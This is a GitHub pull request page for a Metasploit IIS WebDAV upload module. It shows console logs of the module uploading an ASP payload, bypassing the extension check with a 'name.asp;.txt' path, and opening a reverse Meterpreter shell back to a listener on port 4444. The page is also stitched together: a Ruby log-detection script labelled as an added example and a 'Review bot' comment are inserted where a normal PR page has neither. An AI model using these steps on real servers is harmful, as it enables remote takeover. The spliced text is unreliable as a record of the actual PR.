
iis_webdav_upload_asp: Add COPY and a few other tricks #6400

Merged
merged 2 commits
Jan 14, 2016

Conversation

g0tmi1k
Contributor

@g0tmi1k g0tmi1k commented Dec 26, 2015

  • Now supports COPY (sometimes MOVE is limited/disabled)
  • Safety net if you forgot the leading slash for PATH
  • Able to do filename.asp;.txt for the PATH now (as well as a hint to do it, if the session fails)
    • Able to use it to bypass file extension restrictions in older IIS! =)
  • Checks to see if PATH is already on the target before uploading the TEMP file & stops if there is (I cannot overwrite)

Target

meterpreter > sysinfo
Computer        : <REMOVED>
OS              : Windows .NET Server (Build 3790, Service Pack 1).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 3
Meterpreter     : x86/win32
meterpreter >
meterpreter >
meterpreter > shell
[-] Failed to spawn shell with thread impersonation. Retrying without it.
Process 3004 created.
Channel 2 created.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

c:\windows\system32\inetsrv>whoami
whoami
nt authority\network service

c:\windows\system32\inetsrv>

msf exploit(iis_webdav_upload_asp) > show options 

Module options (exploit/windows/iis/iis_webdav_upload_asp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   METHOD    copy             yes       Move or copy the file on the remote system from .txt -> .asp (Accepted: move, copy)
   PASSWORD                   no        The HTTP password to specify for authentication
   PATH      zzz.asp          yes       The path to attempt to upload
   Proxies                    no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST     <REMOVED>        yes       The target address
   RPORT     80               yes       The target port
   USERNAME                   no        The HTTP username to specify for authentication
   VHOST                      no        HTTP server virtual host


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     <REMOVED>        yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(iis_webdav_upload_asp) > 
msf exploit(iis_webdav_upload_asp) > 
msf exploit(iis_webdav_upload_asp) > run

[*] Started reverse handler on <REMOVED>:4444 
[*] Checking /zzz.asp
[*] Uploading 611022 bytes to /zzz.txt...
[*] Copying /zzz.txt to /zzz.asp...
[!] Copy may have failed. [207 Response]
[!] Try using 'set METHOD move' instead
[*] Executing /zzz.asp...
[-] Execution failed on /zzz.asp [404 Not Found]
[-] The COPY action failed. Possibly IIS doesn't allow 'Script Resource Access'.
[!] Try using 'set METHOD move' instead
[!] Pro Tip: Try 'set PATH /metasploit%RAND%.asp;.txt' instead
[*] Exploit completed, but no session was created.
msf exploit(iis_webdav_upload_asp) > 
msf exploit(iis_webdav_upload_asp) > 
msf exploit(iis_webdav_upload_asp) > 
msf exploit(iis_webdav_upload_asp) > set PATH /metasploit%RAND%.asp;.txt
PATH => /metasploit%RAND%.asp;.txt
msf exploit(iis_webdav_upload_asp) > 
msf exploit(iis_webdav_upload_asp) > 
msf exploit(iis_webdav_upload_asp) > run


[*] Started reverse handler on <REMOVED>:4444 
[*] Checking /metasploit140597426.asp;.txt
[*] Uploading 614030 bytes to /metasploit140597426.txt...
[*] Copying /metasploit140597426.txt to /metasploit140597426.asp;.txt...
[*] Executing /metasploit140597426.asp;.txt...
[*] Sending stage (957487 bytes) to <REMOVED>
[*] Deleting /metasploit140597426.asp;.txt (this doesn't always work)...
[!] Deletion failed on /metasploit140597426.asp;.txt [403 Forbidden]
[*] Meterpreter session 6 opened (<REMOVED>:4444 -> <REMOVED>:1066) at 2015-12-26 16:06:32 +0000

meterpreter >
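A detection-side counterpart to the two runs shown above, added here as an example and not code from the Metasploit module or this PR: it scans IIS access-log lines for a PUT of a .txt file followed by a COPY or MOVE that turns it into a script name, including the `.asp;.txt` form. The log field order and the sample lines are constructed assumptions, not real IIS output.

```ruby
# Added example, not code from the Metasploit module or this PR: scan IIS
# W3C-style access-log lines for a PUT of a .txt followed by a COPY/MOVE that
# turns it into a script, including the "name.asp;.txt" form older IIS runs
# as ASP. The field order and the sample lines below are constructed.
SCRIPT_EXT = /\.(asp|aspx|ashx|asmx)(;[^\/]*)?\z/i

# Assumed field order (take the real one from the log's #Fields header):
# date time c-ip cs-method cs-uri-stem cs(Destination) sc-status
def parse_line(line)
  return nil if line.start_with?('#')
  f = line.split(/\s+/)
  return nil if f.size < 7
  { time: "#{f[0]} #{f[1]}", ip: f[2], method: f[3].upcase,
    uri: f[4], dest: (f[5] == '-' ? nil : f[5]), status: f[6].to_i }
end

# Per client, remember .txt files it successfully PUT and flag a later COPY or
# MOVE of one of them to a script-extension target. Attempts are flagged
# whatever the status: the 207 Multi-Status in the PR log hid a failed copy.
def find_webdav_script_uploads(lines)
  staged = Hash.new { |h, k| h[k] = {} }   # ip => { uri => time }
  alerts = []
  lines.each do |l|
    e = parse_line(l) or next
    case e[:method]
    when 'PUT'
      next unless e[:uri] =~ /\.txt\z/i && e[:status].between?(200, 299)
      staged[e[:ip]][e[:uri]] = e[:time]
    when 'COPY', 'MOVE'
      next unless e[:dest] && staged[e[:ip]].key?(e[:uri])
      path = e[:dest].sub(%r{\Ahttps?://[^/]+}, '')  # Destination may be absolute
      m = SCRIPT_EXT.match(path) or next
      alerts << { ip: e[:ip], time: e[:time], src: e[:uri], dest: path,
                  status: e[:status], trick: m[2] ? 'semicolon-extension' : 'rename' }
    end
  end
  alerts
end

# Constructed sample log modelled on the two runs shown in the PR.
SAMPLE_LOG = <<~LOG
  #Fields: date time c-ip cs-method cs-uri-stem cs(Destination) sc-status
  2015-12-26 16:05:01 10.0.0.5 PUT /zzz.txt - 201
  2015-12-26 16:05:02 10.0.0.5 COPY /zzz.txt http://target/zzz.asp 207
  2015-12-26 16:06:10 10.0.0.5 PUT /metasploit140597426.txt - 201
  2015-12-26 16:06:11 10.0.0.5 COPY /metasploit140597426.txt /metasploit140597426.asp;.txt 201
  2015-12-26 16:06:12 10.0.0.5 GET /metasploit140597426.asp;.txt - 200
  2015-12-26 16:07:01 10.0.0.9 MOVE /notes.txt /archive/notes.txt 201
LOG
find_webdav_script_uploads(SAMPLE_LOG.lines).each { |a| puts a.inspect }
```

Both COPY attempts from the first client are reported, the 207 one included, while the ordinary MOVE of a text file by the second client is not.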

@wvu wvu self-assigned this Dec 28, 2015
print_error("Deletion failed on #{path} [No Response]")
return
end

if (res.code < 200 or res.code >= 300)
# Changed this to a warning, because red is scary and if this aprt fails,
# Changed this to a warning, because red is scary and if this part fails,
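Review bot: the only change in this hunk is the comment typo `aprt` -> `part` on the line `# Changed this to a warning, because red is scary and if this part fails,`; while touching this block, the condition `if (res.code < 200 or res.code >= 300)` should drop the parentheses and use `||` rather than the low-precedence `or` keyword, i.e. `if res.code < 200 || res.code >= 300`, matching the Ruby style used elsewhere in Metasploit. Note also that the preceding no-response branch still uses `print_error` and `return`, so the two failure paths of the same deletion step are reported at different severities even though the "red is scary" rationale in the comment applies equally to both.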
Contributor


I prefer the original.

@g0tmi1k
Contributor Author

g0tmi1k commented Dec 31, 2015

Fixed up =)

@wvu wvu merged commit d7061e8 into rapid7:master Jan 14, 2016
wvu added a commit that referenced this pull request Jan 14, 2016
@g0tmi1k
Contributor Author

g0tmi1k commented Jan 14, 2016

Thanks boss! =)

@g0tmi1k g0tmi1k deleted the webdav branch January 14, 2016 20:08
@wvu
Contributor

wvu commented Jan 14, 2016

:)
